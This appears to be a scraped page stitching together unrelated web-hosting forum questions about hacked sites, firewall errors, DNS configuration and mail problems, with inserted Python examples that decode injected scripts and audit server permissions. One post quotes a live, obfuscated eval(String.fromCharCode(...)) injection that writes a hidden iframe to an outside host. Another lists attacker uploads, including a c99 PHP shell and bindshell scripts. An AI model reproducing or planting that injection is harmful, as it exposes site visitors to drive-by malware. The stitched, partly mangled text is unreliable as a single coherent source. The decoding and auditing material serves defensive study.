Unknown Script/hacked Site
Mar 10, 2008
For a bit now, my site has been having problems with a script constantly being added to my index.php and header.php files, despite how many times I remove it.
The script looks like this:  ....
A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?
One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.
Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.
I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.
My site keeps going down every 10 minutes. It'll be online for 10 minutes, then down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself keeps crashing!
And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.
        
Quote:
<script type="text/javascript" src="swfobject.js"></script>
    
<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11  4,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,11  4,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,3  9,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,  50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,  39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,  52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>
What the heck is going on?
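A script of the kind quoted above can be read without running it. The following is an added example, not part of the original post: it decodes `String.fromCharCode(...)` statically, then resolves the `document.write` string concatenation to show the injected iframe. The sample input is constructed and points at the reserved domain `example.invalid`; all function names are illustrative.

```python
import re

# String.fromCharCode(...) whose arguments are only digits, commas and whitespace.
CHARCODE_CALL = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
# var name="literal";  (escaped quotes inside literals are not handled)
VAR_ASSIGN = re.compile(r"""var\s+(\w+)\s*=\s*(["'])(.*?)\2\s*;""")
# One operand of a '+' chain: a quoted literal or a bare identifier.
TERM = re.compile(r"""\s*(?:(["'])(.*?)\1|([A-Za-z_$][\w$]*))\s*""")
IFRAME_SRC = re.compile(r"""<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def decode_charcodes(text):
    """Return the string hidden in each String.fromCharCode(...) call, without running it."""
    decoded = []
    for call in CHARCODE_CALL.finditer(text):
        # Whitespace is never valid inside a number, so stray spaces pasted into
        # the digit run (as in the quoted script) can be dropped safely.
        digits = re.sub(r"\s+", "", call.group(1))
        codes = [int(n) for n in digits.split(",") if n]
        decoded.append("".join(chr(c & 0xFFFF) for c in codes))
    return decoded


def fold_document_write(js):
    """Resolve document.write('..'+name+'..') using string variables declared in js."""
    env = {m.group(1): m.group(3) for m in VAR_ASSIGN.finditer(js)}
    written = []
    for call in re.finditer(r"document\.write\s*\(", js):
        pos, parts = call.end(), []
        while True:
            term = TERM.match(js, pos)
            if term is None:
                parts = None
                break
            if term.group(1):                    # quoted literal (may be empty)
                parts.append(term.group(2))
            elif term.group(3) in env:           # known string variable
                parts.append(env[term.group(3)])
            else:                                # unknown identifier: refuse to guess
                parts = None
                break
            pos = term.end()
            if js[pos:pos + 1] != "+":
                break
            pos += 1
        if parts is not None and js[pos:pos + 1] == ")":
            written.append("".join(parts))
    return written


def analyse(html):
    """One finding per encoded script: decoded source, written markup, iframe targets."""
    findings = []
    for js in decode_charcodes(html):
        written = fold_document_write(js)
        srcs = [src for markup in written for src in IFRAME_SRC.findall(markup)]
        findings.append({"decoded": js, "written": written, "iframe_src": srcs})
    return findings


# Constructed sample with the same shape as the quoted script (not the real payload).
SAMPLE_JS = (
    'var p="exam";var q="ple";var d=".";var t="invalid";var a="ifr";var s="htt";'
    "document.write('<'+a+'ame sr'+'c=\"'+s+'p://'+p+''+q+''+d+''+t+'/'+'\" wid'"
    "+'th=\"1\" h'+'eight=\"3\"></if'+'r'+'ame>');"
)
_codes = ",".join(str(ord(ch)) for ch in SAMPLE_JS)
# Re-create the stray spaces that appear inside the quoted digit run.
SAMPLE_PAGE = ('<body><script type="text/javascript">eval(String.fromCharCode('
               + _codes.replace("1", "1  ", 1) + "))</script></body>")

if __name__ == "__main__":
    for finding in analyse(SAMPLE_PAGE):
        print("decoded :", finding["decoded"])
        print("written :", finding["written"])
        print("iframes :", finding["iframe_src"])
```

Run over every `index.*`, `home.*` and `header.*` file in a web root, the same functions list which pages carry the injection and where the hidden iframe points.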
I got a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... can not and it shows homepage like this:
[url]
What is the best way to clean a hacked site?
All of the pages have iframe injection and my only backup was made after the attack.
I have hundreds of pages, do I have to edit them all manually?
The database has been changed. Some of the data has been altered
The title has been changed to: Hacked By Genc_Rapci
I have set up my Virtual Private Server and uploaded all my site's files to /var/www folder. Before that, there was an old simple 'index.html' file
Code:
<html>
<head>
<title>INDEX</title>
</head>
<body>
<h1>IT WORKS!!!!</h1>
</body>
</html>
and when I typed the address www.mydomain.com it displayed correctly. Then I deleted this html and uploaded my files through FTP and now the browser says :
Code:
Warning: Unknown: failed to open stream: Permission denied in Unknown on line 0
Fatal error: Unknown: Failed opening required '/var/www/index.php' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0
Shell uploaded - Site hacked - How to trace?
Many of my customers let me know that their websites had been hacked. I think it comes from local hacker ....
First of all, I discovered this forum during my quest to unravel the mysteries of how my site was hacked. I hope this is an appropriate forum to discuss the issues even though I am not a web hosting provider, but merely a customer of a web hosting company, hostrocket.com
I have an installation of WordPress 2.1. WordPress creates a couple world writable directories such as Uploads and Cache which are owned by nobody. Apparently (according to the tech support at hostrocket.com) someone was able to insert and execute a php script in my world writable Uploads directory. Over 40MB of scripts, executables and files were uploaded. As best I can tell, my space was being used as some sort of link farm or perhaps acting as a server in my webspace. I do not have much knowledge about these things and consequently can't talk very intelligently about them. But I am trying to grasp what little I am able to absorb about how this could have happened, what I can do to mitigate it from recurring in the future.
Some of the stuff that was in the directory is as follows...
2421            
bindz           
h4ckerz         
mass.pl         p
trace-kmod
2421.1          
brk             
help.php        
mybindshell     
ptrace24
99.php          
coredump        
idf.php         
netcat          
pwned
CMD.php         
dc.pl           
index.html      
online          
r0nin
TMT.htm         
elfdump         
kmod2           
online.tar.gz   
raptor
TTdummyfile     
gcc             
krad3           
prctl2          
uselib24
bind.pl         g
cc.1           
list.txt        
ptrace
The "online" directory contained over 40MB of directories such as...
abortion                        diethylpropion
accounting                      diflucan
accupril                        diovan
acne                            distance-education
actonel                         dospan
actos                           dovonex
acyclovir                       doxycycline
adderall                        drug
adipex                          drug-rehab
adventure-travel                drug-test
adware                          dvd
adware-spyware                  e-pathto
affiliate-program               effexor
air-travel                      elavil
aldara                          enalapril
alprazolam                      equity-loan
altace                          estradiol
amaryl                          evista
ambien                          fioricet
amitriptyline                   flexeril
amoxicillin                     flonase
amoxil                          florida-lottery
antivirus                       fluoxetine
atenolol                        fosamax
ativan                          free-poker
avandia                         free-slots
avapro                          free-spyware
baclofen                        furniture
bankruptcy                      gambling
bextra                          home-equity-loan
biaxin                          home-loan
bingo                           hosting
black-jack                      hotel
blackjack                       hydrocodone
blackjack-game                  images
bontril                         imitrex
britney-spears                  insurance-life
business                        internet-betting
buspar                          internet-gambling
buspirone                       loan
butalbital                      loans
buy-hardware                    lortab
buy-phentermine                 lottery
california-lottery              lotto
captopril                       mesothelioma
car                             mortgages
car-insurance                   online-black-jack
carisoprodol                    online-casino
cars                            online-gambling
cartia                          online-loan
cash-loan                       online-pharmacy
casino                          online-poker
casino-games                    online-roulette
casino-las-vegas                online-slot
celebrex                        payday-advances
celebrex-online                 phentermine
celexa                          poker
celexa-online                   poker-chips
cephalexin                      poker-game
cialis                          poker-tables
cigarette                       refinance
cigarettes                      refinance-house
cipro                           refinance-loan
claritin                        refinancing
clindamycin                     ringtones
clonazepam                      roulette
clonidine                       slot-machine
codeine                         slot-machines
consolidate-card                slots
cozaar                          steroids
credit                          structured-settlement
credit-card                     texas-holdem
credit-card-debt                texas-holdem-poker
credit-card-debt-consolidation  texas-holdem-rules
creditcard                      texas-lottery
cyclobenzaprine                 tramadol
darvocet                        travel
dating                          travel-insurance
debt-consolidation              ultram
debtcard                        valium
denavir                         viagra
diazepam                        vicodin
diclofenac                      video-poker
didrex                          wagering
diet-pills                      xanax
As you can see, I was had in a BIG way.
So the first thing my webhost had me do was to change ownership of the directories owned by nobody to me. Then I was able to change permissions from 777 to 755. However in so doing, I am no longer able to use the Dashboard of WordPress to upload images anymore, unless I temporarily change permissions back to 777.
The other thing the tech support guy did is to create an .htaccess file with,
php_flag engine off
I guess this basically renders php scripts impotent from running.
So without flaming me, can you help me understand how someone in a shared server environment is able to put a php script into one of my directories?
What amazed me was this particular script, "99.php" actually when viewed in a browser window titled phpshell was called "c99adult v. 1.0 pre-release build #16". It basically enabled whoever had access to the URL, to view my webspace, and do all sorts of nasty things. Talk about a wake-up call!
Obviously this enabled the hacker to view my config.php file and ascertain my database password and everything else. Whether  he did, or whether there is a logfile of that info that could enable him to hack the database at some time in the future is unknown to me but it's really freaking me out.
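The conditions described in this post (directories left at mode 777, script files sitting inside them, and an `.htaccess` containing `php_flag engine off`) can be checked across a whole web root. This is an added example, not from the original post or the host's support staff; the extension list, function names and demo tree are assumptions made for illustration.

```python
import os
import re
import stat

# Extensions treated as server-side scripts (an assumed list; extend as needed).
SCRIPT_EXTS = {".php", ".phtml", ".pl", ".cgi"}
# The directive quoted in the post; it is honoured only when PHP runs as an Apache module.
ENGINE_OFF = re.compile(r"^\s*php_flag\s+engine\s+(?:off|0)\s*$", re.I | re.M)


def php_engine_off(directory):
    """True if this directory's own .htaccess turns the PHP engine off.

    Parent directories and the main server config are not consulted.
    """
    try:
        with open(os.path.join(directory, ".htaccess"),
                  encoding="utf-8", errors="replace") as fh:
            return bool(ENGINE_OFF.search(fh.read()))
    except OSError:
        return False


def audit_webroot(root):
    """List world-writable directories under root and the script files inside them."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        mode = stat.S_IMODE(os.lstat(dirpath).st_mode)
        if not mode & stat.S_IWOTH:
            continue                      # not writable by "other": skip
        scripts = sorted(name for name in filenames
                         if os.path.splitext(name)[1].lower() in SCRIPT_EXTS)
        findings.append({
            "dir": os.path.relpath(dirpath, root),
            "mode": format(mode, "03o"),
            "scripts": scripts,           # anything here deserves a manual look
            "php_engine_off": php_engine_off(dirpath),
        })
    return sorted(findings, key=lambda item: item["dir"])


def build_demo_tree(root):
    """Create a small constructed tree (empty files only) to exercise the audit."""
    layout = {
        "uploads": (0o777, ["99.php", "photo.jpg"], None),
        "cache": (0o777, [], "php_flag engine off\n"),
        "themes": (0o755, ["index.php"], None),
    }
    for name, (mode, files, htaccess) in layout.items():
        directory = os.path.join(root, name)
        os.mkdir(directory)
        for filename in files:
            open(os.path.join(directory, filename), "w").close()
        if htaccess:
            with open(os.path.join(directory, ".htaccess"), "w") as fh:
                fh.write(htaccess)
        os.chmod(directory, mode)         # explicit chmod is not affected by umask


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as demo_root:
        build_demo_tree(demo_root)
        for item in audit_webroot(demo_root):
            print(item)
```

A world-writable directory that contains scripts and has no engine-off rule, like `uploads` in the demo tree, matches the state the post describes before the host's changes.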
I host a website on a windows server
and once in a while, i check all the root folders to find a folder that holds 40GB of folder in a folder in a folder... (i never get to the actual files)
Is there a way to prevent this?
I was reviewing my cPanel awStats today.
The browser stats looked something like this:
Firefox 42.9 %
MS Internet Explorer 21 %
Mozilla 17.3 %
Unknown 5.8 %
K-Meleon 5.4 %
Safari 3.7 %
Opera 3.1 %
Netscape 0.1 %
BonEcho (Firefox 2.0 development) 0.1 %
Anyone care to venture a guess as to what the 'unknown' browsers might be?
The thing is that my sysadmin told me that he gets filesize and eta when downloading a file from my server while all of my users and myself get unknown filesize and no eta. got Web Server apache2handler centos 5.1 64bit
I have something weird going on with CSF on a new server. When starting the firewall I get this:
Quote:
Flushing chain `INPUT'
Flushing chain `FORWARD'
Flushing chain `OUTPUT'
Restarting bandmin acctboth chains for cPanel
ACCEPT  all opt -- in lo out *  0.0.0.0/0  -> 0.0.0.0/0  
ACCEPT  all opt -- in * out lo  0.0.0.0/0  -> 0.0.0.0/0  
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
LOG  tcp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_IN Blocked* ' 
LOG  tcp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_OUT Blocked* ' 
LOG  udp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_IN Blocked* ' 
LOG  udp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_OUT Blocked* ' 
LOG  icmp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_IN Blocked* ' 
LOG  icmp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_OUT Blocked* ' 
LOG  all opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *BLOCK_LIST* ' 
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
INVDROP  all opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  state INVALID 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x3F/0x00 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x3F/0x3F 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x03/0x03 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x06/0x06 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x05/0x05 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x11/0x01 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x18/0x08 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x30/0x20 
INVDROP  all opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  state INVALID 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x3F/0x00 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x3F/0x3F 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x03/0x03 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x06/0x06 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x05/0x05 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x11/0x01 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x18/0x08 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x30/0x20 
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
LOGDROPIN  all opt -- in eth+ out *  64.58.165.126  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 64.58.165.126  
LOGDROPIN  all opt -- in eth+ out *  216.105.216.5  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 216.105.216.5  
LOGDROPIN  all opt -- in eth+ out *  64.251.10.133  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 64.251.10.133  
LOGDROPIN  all opt -- in eth+ out *  89.149.240.26  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 89.149.240.26  
LOGDROPIN  all opt -- in eth+ out *  195.87.225.72  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 195.87.225.72  
BLOCKDROP  ...
... 
SPAMHAUS  all opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
Flushing chain `INPUT'
Flushing chain `FORWARD'
Flushing chain `OUTPUT'
Flushing chain `BLOCKDROP'
Flushing chain `DSHIELD'
Flushing chain `INVDROP'
Flushing chain `LOGDROPIN'
Flushing chain `LOGDROPOUT'
Flushing chain `SPAMHAUS'
Flushing chain `acctboth'
Deleting chain `BLOCKDROP'
Deleting chain `DSHIELD'
Deleting chain `INVDROP'
Deleting chain `LOGDROPIN'
Deleting chain `LOGDROPOUT'
Deleting chain `SPAMHAUS'
Deleting chain `acctboth'
Error: iptables command [/sbin/iptables -v -I OUTPUT -p tcp --dport 25 -j ] failed, at line 544
Unknown arg `-j' ? I've been Google'ing, searched WHT and the CSF forums but can't find a solution...
I've bought a basic unmanaged VPS, purely to learn things from it. The best way to learn imo is to hammer the hell out of things, break it, then try to fix it. Anyway, I think I'm part way there, pretty sure I've broken something 
When I start the consoleSSH I get this at the top:
Warning: Unknown iptable module: xt_NFQUEUE, skipped
Warning: Unknown iptable module: xt_mark"IPTABLES="ipt_REJECT, skipped
Warning: Unknown iptable module: xt_NFQUEUE, skipped
Warning: Unknown iptable module: xt_mark"IPTABLES="ipt_REJECT, skipped
Warning: Unknown iptable module: xt_NFQUEUE, skipped
Warning: Unknown iptable module: xt_mark, skipped
Any ideas what's causing it and how I can fix it? ..............
When I am sending mails through my Outlook, the mails are being delivered with an unknown signature as below:
ADVERTISING
--------------------------------------------
<a href=[url]
Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>
from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>
flawless customer support. New discounts and special offers !       <br>
</a>
[url]
--------------------------------------------
Even though I did not set up any signatures. Plesk server with spamguardian running.
my friend has an un-managed VPS plan in kloxo-hypervm mode
yesterday the stats showed in hypervm as the space was over used, so I personally deleted the processed stats which cleared around 20gb space, again today the space is totally consumed, I don't know why it's happening and have no clue where are the other locations where the space could have been consumed i.e similar to location of logs or any other specs which could have been consuming space
unknown space consumption - very high no idea how!
it's actually an image hosting site and I noted that not many pics and not much space was consumed in the pics uploaded in the last 24hrs but this really puzzles and troubles me as I am currently tracking my friend's VPS, please help me sort out this problem and keep my head high before my friend
I have just taken hosting from godaddy. I have taken dedicated website hosting. But my ftp is working in my office FileZilla and not at home. It's giving 530 error, unknown ip address.
I am using FileZilla in office and at home.
i think it's an apache problem, but whenever i download something from my server via http, i get unknown file size when downloading. it's not a big problem, but it's kind of annoying.
does anyone know why it's doing this?
When I install APF 0.9.6 firewall on redhat enterprise linux 5 I get the following error
Starting APF:iptables v1.3.5: Unknown arg `--set-tos'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `--set-tos'
Try `iptables -h' or 'iptables --help' for more information.
[  OK  ]
I'm using the same settings I've been using for years with no errors on RHEL3, but RHEL5 is new to me.
Anyone else run into this issue with APF firewall and RHEL5?
i did upgrade my kernel to 
2.6.18-164.2.1.el5 #1 SMP Wed Sep 30 12:55:19 EDT 2009 i686 i686 i386 GNU/Linux
and after reboot the server when i restart the firewall iptables give me this error
iptables: Unknown error 4294967295 ....
I have recently configured my nodes IPTables but its now throwing out the following error: iptables: Unknown error 4294967295
I have followed the instructions here http://kb.swsoft.com/article_130_875_en.html
Node software: CentOS and HyperVM/OpenVZ
Lately our VPS has needed to be restarted frequently (1-2x daily for the past 5 or so days).
I have pulled our error_log file and pasted below the last several days.  I am hoping someone can take a look at it and point me in the right direction.
Because of limitations, I cannot post anything with urls, but the two errors that have been occurring most frequently are below
Code:
[Mon Mar  3 07:37:22 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:37:32 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:37:42 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:37:52 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:38:02 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:38:12 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Wed Mar  5 07:44:02 2008] [error] Bad pid (15524) in scoreboard slot 44
[Wed Mar  5 07:44:02 2008] [error] Bad pid (3750) in scoreboard slot 46
[Wed Mar  5 07:44:02 2008] [error] Bad pid (3751) in scoreboard slot 47
2008-12-22 14:11:11.404 [INFO] [HTAccess] Updating configuration from [/home/xxxxx/public_html/dir/.htaccess]
2008-12-22 14:11:17.892 [INFO] [HTAccess] Updating configuration from [/home/xxxxxx/public_html/dir/.htaccess]
2008-12-22 14:11:18.973 [INFO] [HTAccess] Updating configuration from [/home/xxxxxx/public_html/.htaccess]
2008-12-22 14:11:18.973 [INFO] [HTAccess] Updating configuration from [/home/xxxxxxx/public_html/dir/.htaccess]
2008-12-22 14:11:21.587 [INFO] [HTAccess] Updating configuration from [/home/xxxxxxx/public_html/.htaccess]
2008-12-22 14:11:21.587 [INFO] [HTAccess] Updating configuration from [/home/xxxxxxx/public_html/dir/.htaccess]
2008-12-22 14:11:40.401 [INFO] [HTAccess] Updating configuration from [/home/xxxxxx/public_html/dir/.htaccess]
I always see those messages in my error log across all my domains on the servers.  
I came across a problematic situation today. Our client pmb.com.my has complained that their domain, when accessed from search engines will go to another site, not theirs. So, perhaps you guys can try this out.
1. Type the URL on the browser directly: [url]
You'll get the real site.
2. Try searching for "pmb malaysia" on Google:
[url]
3. You should see a normal listing for the site as the 1st result. Try clicking that link.
4. In our checks, it will go to a landing page (black background), and will redirect to an adult site.
5. You get this landing page too when you click the link to the site in step 1.
Appreciate if more people can try this out and post your findings here. I've contacted the RZ (site hosted there), and they said it is an issue with Google's cache. Not sure I buy that. 
I have the following problem:
When i try to restart the nameserver service i get the following error:
# service named restart
Stopping named:                                            [  OK  ]
Starting named:
Error in named configuration:
/etc/named.conf:87: unknown option 'e'
/etc/named.conf:120: unexpected end of input
                                                           [FAILED]
my named.conf as follows:
include "/etc/rndc.key";
controls {
        inet 127.0.0.1 allow { localhost; } keys { "rndc-key"; };
};
options {
    /* make named use port 53 for the source of all queries, to allow
         * firewalls to block all ports except 53:
         */
    query-source    port 53;
    // Put files that named is allowed to write in the data/ directory:
    directory "/var/named"; // the default
    dump-file             "data/cache_dump.db";
    statistics-file     "data/named_stats.txt";
   /* memstatistics-file     "data/named_mem_stats.txt"; */
};
logging {
/*      If you want to enable debugging, eg. using the 'rndc trace' command,
 *      named will try to write the 'named.run' file in the $directory (/var/named).
 *      By default, SELinux policy does not allow named to modify the /var/named directory,
 *      so put the default debug log file in data/ :
 */
    channel default_debug {
            file "data/named.run";
            severity dynamic;
    };
};
// All BIND 9 zones are in a "view", which allow different zones to be served
// to different types of client addresses, and for options to be set for groups
// of zones.
//
// By default, if named.conf contains no "view" clauses, all zones are in the
// "default" view, which matches all clients.
//
// If named.conf contains any "view" clause, then all zones MUST be in a view;
// so it is recommended to start off using views to avoid having to restructure
// your configuration files in the future.
view "localhost_resolver" {
/* This view sets up named to be a localhost resolver ( caching only nameserver ).
 * If all you want is a caching-only nameserver, then you need only define this view:
 */
    match-clients         { 127.0.0.0/24; };
    match-destinations    { localhost; };
    recursion yes;
    zone "." IN {
        type hint;
        file "/var/named/named.ca";
};
    // include "/var/named/named.rfc1912.zones";
    // you should not serve your rfc1912 names to non-localhost clients.
    // These are your "authoritativ
zone "smpl.splinteredmedia.net" {
        type master;
        file "/var/named/smpl.splinteredmedia.net.db";
};
e" internal zones, and would probably
    // also be included in the "localhost_resolver" view above :
};
view    "external" {
/* This view will contain zones you want to serve only to "external" clients
 * that have addresses that are not on your directly attached LAN interface subnets:
 */
    recursion no;
    // you'd probably want to deny recursion to external clients, so you don't
    // end up providing free DNS service to all takers
    // all views must contain the root hints zone:
    zone "." IN {
        type hint;
        file "/var/named/named.ca";
    };
    // These are your "authoritative" external zones, and would probably
    // contain entries for just your web and mail servers:
    // BEGIN external zone entries
};
z
zone "smpl.splinteredmedia.net" {
        type master;
        file "/var/named/smpl.splinteredmedia.net.db";
};
I have cPanel installed on a CentOS 5.1 VPS
Iptables have problem on all vps. when we started csf firewall, we have got this error on all vps:
iptables: Unknown error 18446744073709551615
and then iptables blocked all connection. i know that error is for
xt_tcpudp module. please tell me how to load this module on all vps?
also i have a full access to node server.
OS Version: CentOS 5.2
IPtables Version: iptables v1.3.5
Kernel: 2.6.18-028stab053.17 #1 SMP Mon Jun 9 20:42:43 MSD 2008 x86_64 x86_64 x86_64 GNU/Linux
while I am restoring db the following error occurred
Code:
                              
Error at the line 6803: /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
Query: /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
MySQL: Unknown or incorrect time zone: 'NULL'
One of my clients has 2 accounts:
- foo.com, with a mail account info@foo.com.
- bar.com, with domain forwarding to foo.com.
Sending an email message to info@foo.com works.
Sending an email message to info@bar.com doesn't work. When using the ZoneEdit SMTP test utility I get the following error message:
Code:
> RCPT TO:<info@bar.com>
< 550 5.1.1 User unknown: info@bar.com
I checked "/etc/vdomainaliases/bar.com" and "/etc/localdomains", they are configured properly.
Any suggestions?
After the cPanel Update i'm getting this error: Unknown License File Version
In SSH i run this command:
Quote:
/usr/local/cpanel/cpkeyclt
and i get this error:
Quote:
Can't connect to cpanel key server: timeout.
Any other method to Update the License File?